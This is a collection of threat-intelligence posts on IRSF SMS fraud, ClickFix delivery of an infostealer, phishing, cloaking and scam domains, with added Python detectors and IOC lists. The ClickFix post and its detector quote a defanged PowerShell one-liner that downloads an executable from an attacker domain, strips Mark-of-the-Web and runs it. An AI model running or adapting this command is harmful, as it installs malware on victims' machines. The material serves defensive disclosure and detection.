One tap to continue watching. Also: one tap to charge your phone bill €4.50. Click2SMS, what good are you, anyway?

A redirect chain took us from a compromised legitimate site, through help_tds, then through a familiar Germany-based commercial TDS, to hmtraff[.]com where we finally arrived at d[.]gosmartdecision[.]com — part of an IRSF ecosystem we've been tracking since our fake CAPTCHA report.

The landing page shows a fake video player. A large "Continue" button sits in front of it. That button is <a href="sms:81183?body=360 *CWZQ...">. One tap opens the SMS app, pre-loaded with a message to a premium-rate French shortcode. 4.50 EUR per code.

Where the fake CAPTCHA required four separate actions to maintain a verification illusion, the video player needs one. Simpler, faster, probably more effective. The legal disclosure with the price is below the fold in 10pt text, while the large "Continue" button is in the middle of the screen.

There's a second bonus layer: the page runs device fingerprinting and injects a credit card collection form for non-mobile visitors — cardholder name, number, CVV, expiry. Mobile French users see the Click2SMS flow. Others may get card phishing. Two modes. One domain. DNS-visible delivery chain throughout.
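As an added defender-side example (not code from the post, and not the actor's page), here is a small Python scanner that pulls sms: links out of page HTML and flags the Click2SMS pattern: a short numeric recipient with a pre-filled body. The HTML and the body text are constructed placeholders; the real page's code string is not reproduced.

```python
"""Detect Click2SMS-style links: <a href="sms:<shortcode>?body=..."> on a page.
Added example, not the post's or the actor's code. The sample HTML below is
constructed to mimic the described layout; the SMS body is a placeholder."""
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample page (hypothetical markup). The premium link sits in the
# "player" div; the price disclosure is small text further down.
SAMPLE_HTML = """
<div class="player"><a class="btn" href="sms:81183?body=360%20*PLACEHOLDER">Continue</a></div>
<p style="font-size:10pt">Service billed 4.50 EUR per SMS</p>
<a href="https://example.test/terms">Terms</a>
<a href="sms:+33612345678">Text a friend</a>
"""


class SmsLinkCollector(HTMLParser):
    """Collect the href of every <a> whose scheme is sms:."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href") or ""
        if href.lower().startswith("sms:"):
            self.links.append(href)


def parse_sms_href(href):
    """Split 'sms:<recipient>?body=<text>' into (recipient, body).
    parse_qs already percent-decodes the body."""
    recipient, _, query = href[4:].partition("?")
    body = parse_qs(query).get("body", [""])[0]
    return recipient.strip(), body


def is_shortcode(recipient):
    """Carrier shortcodes are short all-digit numbers with no country prefix;
    a full international number (+33...) is not one."""
    return recipient.isdigit() and 3 <= len(recipient) <= 6


def find_click2sms_links(html):
    """Return the sms: links that target a shortcode AND pre-fill a body:
    that combination is what turns a single tap into a chargeable message."""
    collector = SmsLinkCollector()
    collector.feed(html)
    findings = []
    for href in collector.links:
        recipient, body = parse_sms_href(href)
        if is_shortcode(recipient) and body:
            findings.append({"recipient": recipient, "body": body})
    return findings


if __name__ == "__main__":
    for hit in find_click2sms_links(SAMPLE_HTML):
        print(f"premium sms link -> {hit['recipient']} body={hit['body']!r}")
```

Run over crawled landing pages, the shortcode list per country is the piece to maintain; the length heuristic here only separates shortcodes from full subscriber numbers.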

hmtraff[.]com
d[.]gosmartdecision[.]com

Final landing page: https://urlscan.io/result/019f14b2-c99e-7677-a742-61f7c814b545/

Prior report: https://www.infoblox.com/blog/threat-intelligence/hold-the-phone-international-revenue-share-fraud-driven-by-fake-captchas/

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #smishing #tds #irsf


👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.

While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬

The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and paste in the command with the paste hotkey, which fetches the malware. No exploit required, just a checkbox and trust. 🤖

What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs

In other words: vapor no more. 💨

⛔ VoltaStealer C2:
usevolta[.]su

⛔ VoltaStealer Payloads (SHA256):
2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb

⛔ ClickFix PowerShell command (Not VoltaStealer):
command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"
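As an added detection example (not from the post), here is Python that scores PowerShell command lines, such as those captured in process-creation logs, for the traits visible in the one-liner above: hidden window, policy bypass, a method name split into two strings, WebClient download, Mark-of-the-Web removal, and execution of a file dropped under %TEMP%. The first sample is the published one-liner kept defanged; the other two command lines are constructed.

```python
"""Score PowerShell command lines for ClickFix traits. Added example, not the
post's code. CLICKFIX_SAMPLE is the defanged one-liner from the post; the
other samples are constructed."""
import re

# Indicator name -> pattern. Each pattern corresponds to one feature of the
# observed command.
INDICATORS = {
    "no_profile":         re.compile(r"-no(?:p|profile)\b", re.I),
    "hidden_window":      re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I),
    # $w.('Down'+'loadFile'): method name assembled at runtime to dodge keyword matching
    "split_method_name":  re.compile(r"\.\(\s*'[^']*'\s*\+\s*'[^']*'\s*\)"),
    "webclient_download": re.compile(r"Net\.WebClient|Download(?:File|String)", re.I),
    # Zone.Identifier ADS removal, Unblock-File and SEE_MASK_NOZONECHECKS all strip Mark-of-the-Web
    "motw_strip":         re.compile(r"Zone\.Identifier|Unblock-File|SEE_MASK_NOZONECHECKS", re.I),
    # something written under %TEMP% and then invoked
    "temp_drop_and_run":  re.compile(r"\$env:TEMP.*?(?:&|Start-Process|Invoke-Item)\s*\$\w+", re.I | re.S),
}

# The one-liner from the post, kept defanged (hXXps[:]// and [.]) as published.
CLICKFIX_SAMPLE = (
    r"""powershell -nop -w h -ep bypass -c "$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';"""
    r"""$f=$env:TEMP+'\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);"""
    r"""Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f" """
)
BENIGN_SAMPLE = "powershell -Command Get-Process | Sort-Object CPU -Descending"   # constructed
ADMIN_SAMPLE = r"powershell -ep bypass -File C:\scripts\nightly-backup.ps1"       # constructed


def matched_indicators(cmdline):
    """Names of the indicators present in one command line, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_clickfix_like(cmdline, min_hits=3):
    """Flag when a strong indicator (MotW removal or a split method name) is
    present, or when at least min_hits weaker ones stack up. A lone
    '-ep bypass' from an admin script does not trip it."""
    hits = matched_indicators(cmdline)
    strong = {"motw_strip", "split_method_name"}
    return bool(strong & set(hits)) or len(hits) >= min_hits


if __name__ == "__main__":
    for sample in (CLICKFIX_SAMPLE, BENIGN_SAMPLE, ADMIN_SAMPLE):
        print(is_clickfix_like(sample), matched_indicators(sample))
```

The useful signal for hunting is the parent process: a PowerShell launched from the Run dialog (explorer.exe as parent) with these traits is hard to explain as administration.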

⛔ Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8

⛔ ClickFix actor domains:
comalign[.]pro
zorivian[.]pro
nexalora[.]pro
kovraxis[.]com
mevrio[.]com
krebbo[.]world
wobblify[.]cfd
yovu[.]world
glimmerix[.]pro
launcherpatch[.]com
grembix[.]cfd
wumlo[.]shop
plonkert[.]cfd
volpo[.]cfd
fleepax[.]cfd
zixlo[.]cfd
quobnar[.]world
riotmourner[.]pro
youfound[.]fun

Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur

🚨 📡 🇯🇵 Free TV in Japan, at a Cost: "Black-CAS" Spam Campaigns

We've been tracking a high-volume spam campaign targeting Japanese users advertising illegal "Black-CAS" services. In Japan, satellite TV channels are accessed through Conditional Access Systems (CAS), the legitimate pay-per-channel infrastructure used by Japanese broadcasters. Black-CAS exploits that system, intercepting and cloning legitimate smartcard signals to unlock paid content without a subscription.

Beyond the piracy angle, these devices have been documented to come preloaded with malware and residential proxy clients — buyers think they're paying for cheap TV access, but they're also handing over their network to threat actors.

The emails rotate Japanese-language subjects like "簡単に明日からタダになる、魔法のカード" ("a magic card that makes everything free starting tomorrow") or "有料放送が、ずっとただ無料です" ("paid broadcasts, free forever"). Every email carries a set of URL shortener links (clck[.]ru, u[.]to) rather than direct destination URLs — a clear detection evasion mechanism.

The protective shortener layer hasn't made them conservative with the number of domain registrations. Behind it, the infrastructure relies heavily on RDGAs (e.g. mchj43nmd4j53[.]xyz, 87dsq65dh3[.]xyz), while bolder actors directly use overtly themed domains: blackbcas[.]xyz, black-cas-card-tv[.]lol, black-cas-card-jp-super[.]xyz.

At the landing pages, users can directly purchase these devices, as seen in the images below.

This week our data puts Black-CAS alongside phishing and fake shop campaigns in the top threats targeting Japanese speakers — definitely a threat to consider.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #illegalstreaming #asia #japan #blackCAS #tv #malware #residentialproxy #spam #rdga #サイバーセキュリティ #情報セキュリティ #マルウェア #迷惑メール #ブラックCAS

We've written about Keitaro-based cloaking before, and the investment scam ecosystem abusing it remains as active as ever.

🚨 New campaigns continue to blend fake news/investment opportunity lures with global brand impersonation (SoftBank, Channel NewsAsia, CNN Brasil, etc.), paired with tightly controlled cloaking to target victims by region.

The campaign setup is all too familiar:

- Traffic cloaking with Keitaro: Operators use multiple Keitaro accounts to segment campaigns by geography and filter out non-targeted traffic
- Layered social engineering: Fake media narratives build credibility before directing users to investment or crypto registration forms
- Ad-driven distribution: Campaigns use Facebook and Twitter ads to drive victims to scam pages
- Reusable JavaScript kits: Pages deploy Russian-language scripts with fingerprinting and strict validation checks to vet victims
- TDS routing: TDS redirects funnel users who pass validation to fake or sketchy investment platforms or "advisor callback" pages

The consistency of this approach shows how effective and repeatable these techniques remain for driving victim engagement at scale.

Domain sample: justa-solvendaria-es[.]online, newstable[.]online, newsmini18[.]shop, news66[.]shop, news444[.]shop, news534[.]shop, smartrock24[.]shop, timeshe[.]shop

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #keitaro #investmentscam #tds #cloaking

This is not FIFA. This is a domain hijacked by Hazy Hawk. Probably serving up residential proxyware. Definitely nothing good. Check your DNS for lame nameserver delegations.
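As an added example of the check the post asks for (not the post's tooling), here is Python that audits each zone's NS delegation for two conditions: a name server hostname that no longer resolves (dangling), and a server that resolves but does not answer authoritatively for the zone (lame). The lookups are injected, so the sample runs offline against constructed records; the live_* helpers show the same two queries with dnspython.

```python
"""Audit NS delegations for lame or dangling name servers. Added example, not
from the post. The checks run against constructed records via injected lookup
functions; the live_* helpers show the same checks with dnspython."""

# Constructed delegation data: zone -> NS hostnames handed out by the parent.
SAMPLE_DELEGATIONS = {
    "good.example":      ["ns1.dnshost.example", "ns2.dnshost.example"],
    "lame.example":      ["ns1.dnshost.example", "ns.oldprovider.example"],  # 2nd NS name is gone
    "abandoned.example": ["ns7.cloud-dns.example"],                          # host up, zone deleted there
}
# Constructed A lookups (None = NXDOMAIN) and SOA outcomes per (server, zone).
SAMPLE_A = {"ns1.dnshost.example": "192.0.2.1", "ns2.dnshost.example": "192.0.2.2",
            "ns.oldprovider.example": None,      "ns7.cloud-dns.example": "198.51.100.7"}
SAMPLE_SOA = {("192.0.2.1", "good.example"): "AA", ("192.0.2.2", "good.example"): "AA",
              ("192.0.2.1", "lame.example"): "AA", ("198.51.100.7", "abandoned.example"): "REFUSED"}


def fake_resolve_a(host):
    return SAMPLE_A.get(host)


def fake_query_soa(server_ip, zone):
    return SAMPLE_SOA.get((server_ip, zone), "TIMEOUT")


def live_resolve_a(host):
    """Real lookup with dnspython (not needed to run the sample)."""
    import dns.resolver, dns.exception
    try:
        return dns.resolver.resolve(host, "A")[0].address
    except dns.exception.DNSException:
        return None


def live_query_soa(server_ip, zone):
    """Ask the delegated server directly; 'AA' means it claims authority."""
    import dns.message, dns.query, dns.flags, dns.rcode, dns.exception
    try:
        resp = dns.query.udp(dns.message.make_query(zone, "SOA"), server_ip, timeout=3)
    except dns.exception.DNSException:
        return "TIMEOUT"
    if resp.rcode() != dns.rcode.NOERROR:
        return dns.rcode.to_text(resp.rcode())
    return "AA" if resp.flags & dns.flags.AA else "NOT_AA"


def audit_delegation(zone, ns_hosts, resolve_a=fake_resolve_a, query_soa=fake_query_soa):
    """One finding per NS that is dangling (name gone) or lame (not authoritative)."""
    findings = []
    for ns in ns_hosts:
        ip = resolve_a(ns)
        if ip is None:
            findings.append({"ns": ns, "issue": "dangling", "detail": "NS hostname does not resolve"})
            continue
        status = query_soa(ip, zone)
        if status != "AA":
            findings.append({"ns": ns, "issue": "lame", "detail": f"server answered {status}"})
    return findings


def audit_all(delegations, **lookups):
    """Run the audit over every zone; pass resolve_a=live_resolve_a,
    query_soa=live_query_soa for real checks."""
    return {zone: audit_delegation(zone, ns, **lookups) for zone, ns in delegations.items()}


if __name__ == "__main__":
    for zone, findings in audit_all(SAMPLE_DELEGATIONS).items():
        print(zone, findings or "ok")
```

Either finding is worth fixing promptly: a delegation pointing at a name nobody holds, or at a provider where the zone was deleted, is exactly the kind of leftover that lets someone else answer for your domain.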

#dns #phishing #residentialproxy #infobloxthreatIntel #infoblox #worldcup #illegalstreaming

Having trouble finding a free 📺 streaming site for World Cup 🏟️ matches? This threat actor has you covered with thousands of websites for all 104 matches! ⚽

We've been tracking a likely Vietnam-based actor that mass purchases expired domains (we call these dropcatch) and repurposes their existing web traffic to funnel visitors into illegal sports streaming sites, and then straight into a betting platform the same actor operates. The domain portfolio is a graveyard of real internet history: 2026worldcupnorthamerica[.]com (once cited by the Dallas Morning News and the US Men's National Team Facebook fan page), childreninachangingclimate[.]org (formerly a children's aid program), thebreastcancercharities[.]org (formerly non-profit The Breast Cancer Charities of America), and a domain officially used by major US grocery store chains involved in a large proposed merger. Collectively, this actor has spent hundreds of thousands of dollars acquiring dropcatch domains alone — a strong signal that dropcatching is a genuinely effective vehicle for cyber fraud. Behind all of it sits a staggering tech stack operated by a single actor: 5,000+ domains, illegal streaming services, CDNs, TDSs, trackers, cloakers, betting platforms, and mobile apps. That's not a side hustle, that's an enterprise. 🏗️

While the platform largely targets Vietnamese-speaking users, as well as others in Asia and Oceania, the financial damage reaches much further. Sports authorities and broadcasters worldwide are 📉 losing revenue every time someone watches a live NBA 🏀, MLB ⚾, esports 🎮, poker 🃏, or World Cup 🏆 match for free on one of these sites, and this actor has all of them covered.

Some examples from the domains we've uncovered so far:

Dropcatch domains that host or redirect to illegal streaming services:

autoredistrict[.]org
childreninachangingclimate[.]org
2026worldcupnorthamerica[.]com
folsomprisonmuseum[.]org
allaboutbasketball[.]us
thebreastcancercharities[.]org

Fraudulent domains that host or redirect to illegal streaming services:

90phutaa[.]cc
90phutab[.]cc
90phutac[.]cc
xoilaczzzzw[.]tv
xoilaczzzzt[.]tv
xoilaczzzzh[.]tv

Lookalike domains used by the betting platforms:

fifa001[.]com
fifa002[.]com
fifa02[.]com
worldcup00[.]com
worldcup000[.]com
worldcup02[.]com

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #dropcatch #malvertising #illegalstreaming #sportsbetting #domainabuse #vietnam #worldcup #asia #fifa #streaming #betting #2026worldcup #charities #nonprofit #lookalike #xoilac #90phut

65% - that's how many of our Threat Defense Cloud customers have been observed accessing residential proxy services. But how many of them are aware of this?
Our latest report is a deep dive into the growing phenomenon we call 'resproxies'. Resproxies, which are often embedded in Android IoT devices, or baked into "free" applications, may be running in your environment, granting access to your own IP space, or even worse, like in the case of Kimwolf, granting access to your internal network. Turns out "bring your own device" sometimes means "bring your own residential proxy." 😬

Our new research (with @synthient who covered what happens on the other end):
🔗 https://www.infoblox.com/blog/threat-intelligence/residential-proxies-in-the-wild/
#dns #threatintel #threatintelligence #cybercrime #cyber #cybersecurity #infosec #infoblox #infobloxthreatintel #residentialproxy #resproxy

Threat actors are leveraging shared infrastructure together with subdomain abuse to control and serve hundreds of malicious websites with minimal management.

This week we were investigating a cluster of crypto brand lookalike domains. Through subdomain abuse – often powered by wildcard DNS configurations – just 34 registered domains expand to over 500 scam sites.

Investigating website content across that cluster allowed us to find several additional clusters running the same playbook. Thousands of domains on them.

This initial cluster impersonated dozens of brands — Binance, Coinbase, Kraken, KuCoin, Bybit, Bitmart. Several of these sites push fake app downloads, making malware delivery and crypto wallet theft a likely component of the broader operation.

A sample of the domains associated:

cryptocoinsx[.]cfd
bmarkit[.]com
zznyusbsgo.bitmart[.]pw
4pzyy6n7log71mm0.bitmarts[.]cc
5etxkk2aeh8jfgl0.bitstamptc[.]com
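As an added example (not the post's tooling), here is Python that does the collapsing step behind the "34 domains, 500+ sites" observation: it maps observed hostnames to their registered domain, counts how many distinct subdomains each apex carries, and flags apexes whose subdomain labels look machine-generated, the signature of a wildcard record fanning out per-campaign hostnames. The first three hostnames are the post's samples, refanged; the remaining ones are constructed. The apex extraction is deliberately naive (last two labels) and is labelled as such.

```python
"""Collapse observed hostnames to their registered domain and flag apexes that
fan out into generated subdomains. Added example, not the post's tooling.
The first three hosts are the post's samples, refanged; the rest are constructed."""
from collections import defaultdict

SAMPLE_HOSTS = [
    "zznyusbsgo.bitmart.pw",            # from the post
    "4pzyy6n7log71mm0.bitmarts.cc",     # from the post
    "5etxkk2aeh8jfgl0.bitstamptc.com",  # from the post
    "k3j9q1zz0a2b.bitmarts.cc",         # constructed
    "www.bitmarts.cc",                  # constructed
    "cryptocoinsx.cfd",                 # from the post (bare apex)
    "bmarkit.com",                      # from the post (bare apex)
]


def registered_domain(host):
    """Naive apex = last two labels. Production code should use the Public
    Suffix List so that names under e.g. co.uk are handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def looks_generated(label):
    """Crude signal: a long label mixing letters and digits is rarely chosen
    by a human for a real service name."""
    return (len(label) >= 8
            and any(c.isdigit() for c in label)
            and any(c.isalpha() for c in label))


def cluster_by_apex(hosts):
    """apex -> set of subdomain parts ('' marks the bare apex itself)."""
    clusters = defaultdict(set)
    for host in hosts:
        apex, sub = registered_domain(host)
        clusters[apex].add(sub)
    return clusters


def expansion(hosts):
    """(observed hostnames, registered domains): the ratio the post describes
    as 34 domains expanding to 500+ sites."""
    return len(set(hosts)), len(cluster_by_apex(hosts))


def wildcard_suspects(hosts, min_subdomains=2):
    """Apexes with several distinct subdomains of which at least one looks
    generated: candidates for a wildcard record serving per-campaign hostnames."""
    suspects = {}
    for apex, subs in cluster_by_apex(hosts).items():
        named = {s for s in subs if s}
        if len(named) >= min_subdomains and any(looks_generated(s.split(".")[0]) for s in named):
            suspects[apex] = sorted(named)
    return suspects


if __name__ == "__main__":
    print("hosts/apexes:", expansion(SAMPLE_HOSTS))
    for apex, subs in wildcard_suspects(SAMPLE_HOSTS).items():
        print(apex, "->", subs)
```

On real passive-DNS data the threshold should be far higher than 2, and a quick confirmation is to resolve a label you invented yourself under the apex: if it answers, the wildcard is there.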

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #Phishing #Scams #malware #crypto #lookalikes #subdomains #iocs

Boss too tough? Salary too low? If you're after a new gig, look no further 💼

We’re tracking a recruitment‑themed phishing campaign that opens with hope of a career upgrade and ends in stolen credentials.

Victims are targeted through emails spammed out by “recruiters” impersonating real people — LinkedIn profiles copied in full, including photos and current recruiter identities. The lure leans on exciting big‑name brands including FIFA, UEFA, Nike and Spotify to anchor legitimacy before prompting victims to schedule an interview using a bogus Calendly page 👔 💫

About time they noticed your stellar performance, right? But this interview comes with a catch 🎣 To seal the deal, you'll need to log in with your company email.

The mechanics:
• Initial outreach primes the role and rapport with some feel-good shmoozing
• Link to schedule your interview lands on a cloned Calendly recruitment portal
• Follow‑on contact nudges the victim through staged redirects
• Your credentials submit their 30-day notice ⚠️

Behind the scenes:
• Convincing lookalike domains generated at scale (RDGAs), rotated aggressively
• Layered redirect chains to blur origin and intent
• Compromised or fraudulently obtained Salesforce Marketing Cloud used for delivery, helping mails sail past controls
• Lure pages clone the Pinpoint ATS — attribution supported by Pinpoint’s own Cloudinary account ID (pinpointhq) embedded in assets
• Domain validation logic limits logins to business email providers, excluding free webmail services

Sad to say, the only thing getting “shortlisted” here is your inbox for another round of credential theft.

IOCs
• brand-jobs[.]com
• brand-careers[.]com
• hr-brand[.]com
• brand-talenthub[.]com

These campaigns remain active, with the actor spinning up new lures impersonating other major brands. We regret to inform you, it seems they'll be moving forward with other candidates 😩

Better luck next time.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing

⚽ Looking for FIFA World Cup tickets without the queue?

We're continuously tracking a surge in convincing FIFA lookalike sites we first posted on last month, but this isn't your typical phishing game — it's full‑blown counterfeit ticketing, run like a high‑volume e‑commerce operation.

Premier League theatrics. Sunday league legitimacy 🎭

The flow:
• Land on a polished FIFA clone
• Auto‑localized content (language, region, pricing)
• "Checkout" pushed through rotating payment domains

Behind the curtain:
• ⚡ High domain churn — fresh registrations daily
• 🔄 Payment infrastructure swapped in/out to dodge disruption
• 🪞 Near-perfect mirroring of official FIFA content

There are indicators pointing to Chinese‑origin operators (hosting patterns, code artifacts), but targeting is global—and scalable.

The interesting bit? This isn't about stealing creds.

It's about conversion at scale. Auto-localisation + disposable infrastructure = throughput over stealth.

No ticket. No refund. Reliable revenue stream.

While this actor keeps kickin' and churning out new domains, we'll be here tracking the infrastructure... and yes it's because we can't afford a real ticket to the game.

#dns #threatintel #cybersecurity #infosec #scam #phishing #infoblox #infobloxthreatintel #WorldCup2026 #FIFA